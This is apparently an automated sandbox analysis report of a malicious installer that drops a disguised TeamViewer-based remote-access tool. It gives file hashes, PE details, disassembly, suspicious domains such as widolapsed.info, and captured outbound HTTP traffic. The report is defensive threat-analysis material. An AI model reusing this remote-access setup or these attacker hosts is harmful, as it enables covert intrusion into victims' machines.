                                                                                                      SHA1:43ED3DD9863791294064D2F85F3DF3F08D572037
                                                                                                      SHA-256:4BA3BD623A9919A357708DA57BBBBC978706DAD8D57DA64E89C780147843C7CE
                                                                                                      SHA-512:3740DFD9F8ED967953C6A3522D66B5E547D3BB2A4C618FD667A817F6283E4353E2B81E994938E989AEA89BFD7A23E41309647EDCD1F6F0A075436E5B1FEE7B0A
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Metadefender, Detection: 6%, Browse
                                                                                                      • Antivirus: ReversingLabs, Detection: 51%
                                                                                                      Reputation:unknown
                                                                                                      C:\Users\user\AppData\Roaming\ViberPC\Icons\TeamViewer.ini
                                                                                                      Process:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      File Type:data
                                                                                                      Category:modified
                                                                                                      Size (bytes):2686
                                                                                                      Entropy (8bit):3.08315222410398
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Eo+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+J:4
                                                                                                      MD5:2EC23B404939C7DD6574832D486A52A4
                                                                                                      SHA1:0F29DBB69ECDFC319C36D354E673B0C2108155DA
                                                                                                      SHA-256:4B76AA0920E1C1F44F69AF968390128D41C5E0BBD8690B86FC5FBA8FAE9980BB
                                                                                                      SHA-512:97E4EA5179D8B175BFDCA1A1FFA74288403F0C3DA85ECD74F7B328471130C98EC53010A489EE72A871611B4BF5B37D47229FC34BFACB919A15D4B36705F6FC30
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview: h.d.n.=.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o.....h.p.n.=./.B.8.C.6.3.1.A.8./.....h.s.n.=.1.....h.t.=.3.6.....r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.
                                                                                                      C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dll
                                                                                                      Process:C:\Users\user\Desktop\wogZe27GBB.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):607528
                                                                                                      Entropy (8bit):6.564133582926054
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:r5hmfFy7ZJ0uUCAD06v7JlHZctms+2lifZ0iMe8d6YySkYQKMDqtAu3NhgGy6wSP:Vhmf4ACAzneosEi6YhvAuUGyUrNJbL
                                                                                                      MD5:554EE592B125CFDF81B376B5C24AA61C
                                                                                                      SHA1:666D2C04171246734575D4453289AA2D9AF93B97
                                                                                                      SHA-256:B296EF421D5B7F569E623D41A42D87A064C4358CFA89A192988F854929E3ABD1
                                                                                                      SHA-512:6C3111BF9D26929D426797EBDD8D804B34E2E8F593BF488298E70964538F2DA3D971C4ED3C3237C829AE7DE4FDB8D4316D84F153E93E3788808547A8538B73F5
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Reputation:unknown
                                                                                                      C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      Process:C:\Users\user\Desktop\wogZe27GBB.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4375848
                                                                                                      Entropy (8bit):6.621789733656387
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:98304:6jdgHPmMogx1WZRkPapqj+ZG/D+AKbS5m:4qHuMogsRkyq0N
                                                                                                      MD5:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                      SHA1:A3A7498F02BAB188B3944382BBA4D016D63607D1
                                                                                                      SHA-256:D2CDCA8EFA27089D3DEAD0CCEAFBE470B3815C9C2A362C007D1F516E5379AC92
                                                                                                      SHA-512:412B42C540A9FE41709453D725B7A1E888849326A70A411E645F29240D730D69EBCF4B26E6870D33E0A395C612470BD00064025D22B0C6BCD211242E8EF6CEA6
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Reputation:unknown
                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............o...o...o.......o.......o.....2.o.....q.o.F.2...o...n...o.......o.F.0...o.......o.......o.......o.Rich..o.................PE..L.....LK..................3.........F........03...@...........................K......ZC.......................................@...... K.8`............B.(...........pe4......................x:.....`x:.@............03. ............................text.....3.......3................. ..`.rdata..&....03.......3.............@..@.data...h....P@.."...*@.............@....tls..........K......LB.............@....rsrc...8`... K..b...NB.............@..@........................................................................................................................................................................................................................................................................................................
                                                                                                      C:\Users\user\AppData\Roaming\ViberPC\Icons\vpn.cab
                                                                                                      Process:C:\Users\user\Desktop\wogZe27GBB.exe
                                                                                                      File Type:Microsoft Cabinet archive data, 71196 bytes, 8 files
                                                                                                      Category:dropped
                                                                                                      Size (bytes):71196
                                                                                                      Entropy (8bit):7.996182851828797
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:qUTRtkxXFuG1DKNYCqRBiFxMZPQCJh/njgG5+jC5hA101pNO0:qUNtax12mCqRBiyQG/jgG5+j2NO0
                                                                                                      MD5:8A84AA1B9F20DC194947D7AC592D818E
                                                                                                      SHA1:4A77AB0D59F39BF600BB89D9121446F6AA2D139B
                                                                                                      SHA-256:8A740BE5D92B734E77B210354988DFD49F31C49814240513CF4B0353A8CE6DFB
                                                                                                      SHA-512:B3F90ADB48861CD775F15E75885C81A130D62DFE429A5833FA1CE0BC203EEA15BD8A7306618B1F4D27810493300400C8B149D58032F90F0E9D93B04F9B8F1050
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview: MSCF............,...............JA..H........)........k<'b..64\teamviewervpn.cat......)....k<'b..64\TeamViewerVPN.inf.(....>....k<'b..64\teamviewervpn.sys..<........k<&b..64\install.exe..)........k<'b..86\teamviewervpn.cat......-....k<'b..86\TeamViewerVPN.inf..b...B....k<'b..86\teamviewervpn.sys...........k<&b..86\install.exe.h.t"X<..[.....`.....@...N.f.|..U.......$."..L.F..4....|....U$Q/...%.J).D...@F.......f...9..../@.x;.N..w..2...i1P.....O.....T...T.y...``...;.$.&....@........@..~..\...J.44...:.@....M.....x\.0c|..W...,.|.x..+.P..N.. ..S0@B.;?.(..B..,.%.{.. ....(T.....U.5..=.3'rxci.;....P$..H)...1...h._e..{....Q._..}...K......U.s...._..WRWlS.8.._...D.NI..>.|O<..q...$0.EA*8d...../..=@2q...g_.Hs|`+...`.>U..)X.G*.8.....>..!4 ....}..Ps.a.8.......4.0`._t%...P.qgr..'..~.d..r.....o...w..q........,O.K..Y.8..M.D...p........~.....O?......}@.....>....O..N...c../p..[....._=.~.S....Q..p.O...@.WL....*..}..%1...3a.....u...)..K.Y...s..E;...".e.....X0(IR..'..1...\..6...(i
                                                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):55
                                                                                                      Entropy (8bit):4.306461250274409
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                                      Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                      File Type:data
                                                                                                      Category:modified
                                                                                                      Size (bytes):906
                                                                                                      Entropy (8bit):3.148609195269616
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:58KRBubdpkoF1AG3rlsQlw3IH5k9+MlWlLehB4yAq7ejCEsQlw3IHI:OaqdmuF3rlp+F+kWReH4yJ7MNp+f
                                                                                                      MD5:ADC0A8B01369CAC8EB3BF72C06D5D1C2
                                                                                                      SHA1:E3F79ECF0CCC2F022F9264DBF28268FF2F18157F
                                                                                                      SHA-256:FC5F3AA59658229CEB400FD3D707B0977E947F5DD13862044ABCCEEA1BB416D5
                                                                                                      SHA-512:F0BC86DE276547D63DD085C2E37F4A33BFC58E874F077CC6A910F83455EF36B18E367B0B9C170F5D10AC3EFE439E070451E4367B03BB86384EA9191C5DBDC15D
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:
                                                                                                      -------------------------------------------------------------------------------------
                                                                                                      MpCmdRun: Command Line: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                       Start Time: Wed Sep 15 2021 13:46:22
                                                                                                      MpEnsureProcessMitigationPolicy: hr = 0x1
                                                                                                      WDEnable
                                                                                                      ERROR: MpWDEnable(TRUE) failed (800704EC)
                                                                                                      MpCmdRun: End Time: Wed Sep 15 2021 13:46:22
                                                                                                      -------------------------------------------------------------------------------------

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Entropy (8bit):7.995528478877956
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                                      • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:wogZe27GBB.exe
                                                                                                      File size:1773472
                                                                                                      MD5:5efc68abd7fec415e34980d95a06a66a
                                                                                                      SHA1:34b243a0b3e322b8983b528caa5849395360a91d
                                                                                                      SHA256:0f655a8ac0d7fdc7ac44fdd9799129848faf9c73bfa0e108fd903de439447232
                                                                                                      SHA512:92aa33884c54bdb2608994b3e4c9b0909b002a38344bae2b4fb01c9a713542cf8a51684a0e3d614730340a995bb918dedb5e4c801ba9e3afa834399f38232079
                                                                                                      SSDEEP:49152:tMvOJUaiTddo110aPENuUn/vrmUJjefHj9uDd:tHjiTvLn3rb4jkd
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L.....*J.................\.........

                                                                                                      File Icon

                                                                                                      Icon Hash:8282c2d2d2c292a1

                                                                                                      Static PE Info

                                                                                                      General

                                                                                                      Entrypoint:0x40323c
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:true
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x4A2AE2A2 [Sat Jun 6 21:41:54 2009 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:4
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:4
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:4
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:5bd07784f328e868356a895d4ab1a505

                                                                                                      Authenticode Signature

                                                                                                      Signature Valid:true
                                                                                                      Signature Issuer:CN=Sectigo RSA Code Signing CA, O=Sectigo Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                      Signature Validation Error:The operation completed successfully
                                                                                                      Error Number:0
                                                                                                      Not Before, Not After
                                                                                                      • 4/20/2021 5:00:00 PM, 4/21/2022 4:59:59 PM
                                                                                                      Subject Chain
                                                                                                      • CN=Mapping OOO, O=Mapping OOO, L=Saint Petersburg, C=RU
                                                                                                      Version:3
                                                                                                      Thumbprint MD5:B9C33DB697628B5EB88B4004D0D6900E
                                                                                                      Thumbprint SHA-1:D9F41380CE8E8E22E2EF7F558D6D17BB94AA28BE
                                                                                                      Thumbprint SHA-256:7B5C783B055EB8BA37480ED0E990E3A4631D38531485ECF3875FE213B2FB661D
                                                                                                      Serial:00A46F9D8784778BAA48167C48BBC56F30

                                                                                                      Entrypoint Preview

                                                                                                      Instruction
                                                                                                      sub esp, 00000180h
                                                                                                      push ebx
                                                                                                      push ebp
                                                                                                      push esi
                                                                                                      xor ebx, ebx
                                                                                                      push edi
                                                                                                      mov dword ptr [esp+18h], ebx
                                                                                                      mov dword ptr [esp+10h], 00409130h
                                                                                                      xor esi, esi
                                                                                                      mov byte ptr [esp+14h], 00000020h
                                                                                                      call dword ptr [00407030h]
                                                                                                      push 00008001h
                                                                                                      call dword ptr [004070B4h]
                                                                                                      push ebx
                                                                                                      call dword ptr [0040727Ch]
                                                                                                      push 00000008h
                                                                                                      mov dword ptr [00423F58h], eax
                                                                                                      call 00007FD2C0F3AECEh
                                                                                                      mov dword ptr [00423EA4h], eax
                                                                                                      push ebx
                                                                                                      lea eax, dword ptr [esp+34h]
                                                                                                      push 00000160h
                                                                                                      push eax
                                                                                                      push ebx
                                                                                                      push 0041F458h
                                                                                                      call dword ptr [00407158h]
                                                                                                      push 004091B8h
                                                                                                      push 004236A0h
                                                                                                      call 00007FD2C0F3AB81h
                                                                                                      call dword ptr [004070B0h]
                                                                                                      mov edi, 00429000h
                                                                                                      push eax
                                                                                                      push edi
                                                                                                      call 00007FD2C0F3AB6Fh
                                                                                                      push ebx
                                                                                                      call dword ptr [0040710Ch]
                                                                                                      cmp byte ptr [00429000h], 00000022h
                                                                                                      mov dword ptr [00423EA0h], eax
                                                                                                      mov eax, edi
                                                                                                      jne 00007FD2C0F382CCh
                                                                                                      mov byte ptr [esp+14h], 00000022h
                                                                                                      mov eax, 00429001h
                                                                                                      push dword ptr [esp+14h]
                                                                                                      push eax
                                                                                                      call 00007FD2C0F3A662h
                                                                                                      push eax
                                                                                                      call dword ptr [0040721Ch]
                                                                                                      mov dword ptr [esp+1Ch], eax
                                                                                                      jmp 00007FD2C0F38325h
                                                                                                      cmp cl, 00000020h
                                                                                                      jne 00007FD2C0F382C8h
                                                                                                      inc eax
                                                                                                      cmp byte ptr [eax], 00000020h
                                                                                                      je 00007FD2C0F382BCh
                                                                                                      cmp byte ptr [eax], 00000022h
                                                                                                      mov byte ptr [eax+eax+00h], 00000000h

                                                                                                      Rich Headers

                                                                                                      Programming Language:
                                                                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                      Data Directories

                                                                                                      Name | Virtual Address | Virtual Size | Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a4 | 0xb4 | .rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x44000 | 0x13d8 | .rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1aefc0 | 0x1fe0 |
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                                                      Sections

                                                                                                      Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                                                      .text | 0x1000 | 0x5a5a | 0x5c00 | False | 0.660453464674 | data | 6.41769823686 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                      .rdata | 0x7000 | 0x1190 | 0x1200 | False | 0.375217013889 | SysEx File - | 4.24219639454 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .data | 0x9000 | 0x1af98 | 0x400 | False | 0.55859375 | data | 4.70902740305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                      .ndata | 0x24000 | 0x20000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .rsrc | 0x44000 | 0x13d8 | 0x1400 | False | 0.2705078125 | data | 3.94953591447 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                      Resources

                                                                                                      Name | RVA | Size | Type | Language | Country
                                                                                                      RT_ICON | 0x441f0 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
                                                                                                      RT_ICON | 0x44758 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                                                                                                      RT_ICON | 0x44bc0 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
                                                                                                      RT_DIALOG | 0x44ce8 | 0x202 | data | English | United States
                                                                                                      RT_DIALOG | 0x44ef0 | 0xf8 | data | English | United States
                                                                                                      RT_DIALOG | 0x44fe8 | 0xee | data | English | United States
                                                                                                      RT_GROUP_ICON | 0x450d8 | 0x30 | data | English | United States
                                                                                                      RT_MANIFEST | 0x45108 | 0x2cc | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                                                                                                      Imports

DLL | Import
KERNEL32.DLL | CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
USER32.dll | EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                                                      Possible Origin

Language of compilation system | Country where language is spoken
English | United States

                                                                                                      Network Behavior

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets


                                                                                                      UDP Packets


                                                                                                      DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Sep 15, 2021 13:45:18.363656998 CEST | 192.168.2.3 | 8.8.8.8 | 0x4384 | Standard query (0) | ping3.dyngate.com | A (IP address) | IN (0x0001)
Sep 15, 2021 13:45:20.264966965 CEST | 192.168.2.3 | 8.8.8.8 | 0xf98d | Standard query (0) | ping3.dyngate.com | A (IP address) | IN (0x0001)
Sep 15, 2021 13:45:21.015845060 CEST | 192.168.2.3 | 8.8.8.8 | 0x7997 | Standard query (0) | master12.teamviewer.com | A (IP address) | IN (0x0001)
Sep 15, 2021 13:45:23.053232908 CEST | 192.168.2.3 | 8.8.8.8 | 0x1c63 | Standard query (0) | widolapsed.info | A (IP address) | IN (0x0001)

                                                                                                      DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Sep 15, 2021 13:45:18.400454998 CEST | 8.8.8.8 | 192.168.2.3 | 0x4384 | Name error (3) | ping3.dyngate.com | none | none | A (IP address) | IN (0x0001)
Sep 15, 2021 13:45:20.292700052 CEST | 8.8.8.8 | 192.168.2.3 | 0xf98d | Name error (3) | ping3.dyngate.com | none | none | A (IP address) | IN (0x0001)
Sep 15, 2021 13:45:21.047782898 CEST | 8.8.8.8 | 192.168.2.3 | 0x7997 | No error (0) | master12.teamviewer.com |  | 185.188.32.22 | A (IP address) | IN (0x0001)
Sep 15, 2021 13:45:23.120400906 CEST | 8.8.8.8 | 192.168.2.3 | 0x1c63 | No error (0) | widolapsed.info |  | 45.153.241.148 | A (IP address) | IN (0x0001)

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • widolapsed.info
                                                                                                      • master12.teamviewer.com
                                                                                                      • 188.172.198.151

                                                                                                      HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
44 | 192.168.2.3 | 49746 | 185.188.32.22 | 80 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 13:45:21.084033966 CEST | 1051 | OUT | GET /din.aspx?s=00000000&client=DynGate&rnd=37826655&p=10000001 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: master12.teamviewer.com
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 13:45:21.104980946 CEST | 1051 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-Type: application/octet-stream
Content-length: 10
Data Raw: 17 24 34 30 30 38 32 38 34 39
Data Ascii: $40082849
Sep 15, 2021 13:45:21.132512093 CEST | 1052 | OUT | GET /dout.aspx?s=40082849&p=10000001&client=DynGate&data=FyQSawCjHqkys5MkoZ6aGJqbGZocGBMkoh6YEyagoZ6YPDKxsxoxMRizMZqcGy+Ym5wYGpuYGRsbkyakoh6YPDKxsxoxMRizMZqcGy+Ym5wYGpuYGRsbkyepnqu0txmXGJiTKx6YmpcYFxscG5AoqQ== HTTP/1.1
Accept: */*
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: master12.teamviewer.com
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 13:45:21.153398991 CEST | 1052 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-length: 0
Sep 15, 2021 13:45:21.155066967 CEST | 1052 | OUT | GET /din.aspx?s=40082849&client=DynGate&p=10000002 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: master12.teamviewer.com
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 13:45:21.176011086 CEST | 1052 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-Type: application/octet-stream
Content-length: 16
Data Raw: 17 24 13 0b 00 18 20 19 9c 98 98 18 9b 9c 1c 1c
Data Ascii: $


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
45 | 192.168.2.3 | 49747 | 185.188.32.22 | 80 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 13:45:21.207201958 CEST | 1053 | OUT | GET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: master12.teamviewer.com
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 13:45:21.228383064 CEST | 1053 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-Type: application/octet-stream
Content-length: 10
Data Raw: 17 24 34 30 30 38 32 38 35 39
Data Ascii: $40082859
Sep 15, 2021 13:45:21.230412960 CEST | 1054 | OUT | GET /dout.aspx?s=40082859&p=10000001&client=DynGate&data=FyQS7wAjHqmyuig6sTY0saWyvJMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJqSiHpg8MrGzGjExGLMxmpwbL5ibnBgam5gZGxuTKx6YmpcYFxscG5AoqZMhNLcwuTyegwEAAABSAAApKaCYgAIAAAiAAABb76jy6JCEtP10hWwK5JgAShY7zj+R7R3DOU3+0YZJRajqI5wj4APqnpqJTTfow2rFHUX7lb5rKPxXbMNzymnW3afsLjONOJOSFwYGgTrjCxDXlTyXTROrLUrNxoJ5e0wRdRUaIY3bkkZHP/DCc/GC84acwVg91URMKSdn0IIfWg== HTTP/1.1
Accept: */*
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: master12.teamviewer.com
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 13:45:21.251317978 CEST | 1054 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-length: 0
Sep 15, 2021 13:45:21.256596088 CEST | 1054 | OUT | GET /din.aspx?s=40082859&client=DynGate&p=10000002 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: master12.teamviewer.com
Connection: Keep-Alive
